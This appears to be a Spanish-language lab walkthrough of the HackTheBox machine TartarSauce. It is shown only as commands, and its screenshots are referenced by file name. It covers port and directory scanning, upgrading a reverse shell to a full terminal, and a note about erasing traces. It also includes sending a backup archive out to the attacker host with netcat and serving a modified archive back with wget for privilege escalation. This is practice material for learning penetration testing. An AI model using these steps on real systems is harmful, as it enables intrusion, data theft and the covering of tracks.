nmap -p- --open -T5 -v -n 10.129.1.185

nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.129.1.185 -oG allPorts

Pasted image 20210813142034.png

extractPorts allPorts

nmap -sCV -p80 10.129.1.185 -oN targeted

whatweb http://10.129.1.185

Pasted image 20210813142437.png

Pasted image 20210813142700.png

Pasted image 20210813142721.png

wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.185/webservices/FUZZ

Pasted image 20210813143401.png

echo "10.129.1.185 tartarsauce.htb" | sudo tee -a /etc/hosts

Pasted image 20210813145032.png

wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.185/webservices/FUZZ

Pasted image 20210813145237.png

vim wp-load.php

Pasted image 20210813145955.png

Pasted image 20210813152946.png

script /dev/null -c bash
Después hacer un Ctrl+Z
stty raw -echo; fg
reset
El terminal type es: xterm
export TERM=xterm
export SHELL=bash
stty rows 51 columns 189
(Los valores de rows y columns dependen de la terminal local; se obtienen con `stty size`.)

Pasted image 20210813155121.png

Pasted image 20210814075103.png

#para borrar huellas

Pasted image 20210814092123.png

Pasted image 20210814093510.png

watch ls -la /var/tmp

Pasted image 20210814093922.png

systemctl list-timers

Pasted image 20210814094637.png

tar -zcvf backup.tar /var/www/html

Hacemos un tar del directorio. La opción -z lo comprime con gzip, aunque el nombre del archivo termine en .tar.

Pasar un archivo de Linux a Linux

Pasted image 20210814094842.png

Desde la máquina atacada mandamos el archivo a Kali

nc 10.10.14.108 443 < backup.tar

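Y en Kali recibimos el archivo comprimido. Este listener debe estar a la escucha antes de ejecutar el envío anterior. nc no cifra ni verifica la transferencia, así que conviene comparar `md5sum backup.tar` en ambos extremos.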

nc -lvnp 443 > backup.tar

Pasted image 20210814095108.png

tar -xf backup.tar

Pasted image 20210814095301.png

Hacemos el siguiente script y lo corremos

Pasted image 20210814105919.png

Pasted image 20210814100958.png

Comprimimos el directorio de nuevo

tar -zcvf backup.tar /var/www/html

Pasted image 20210814101137.png

python3 -m http.server 80

wget http://10.10.14.108/backup.tar

Pasted image 20210814105515.png

chmod +x ne_exploit.sh

Le damos permisos de ejecución.

Pasted image 20210814105826.png
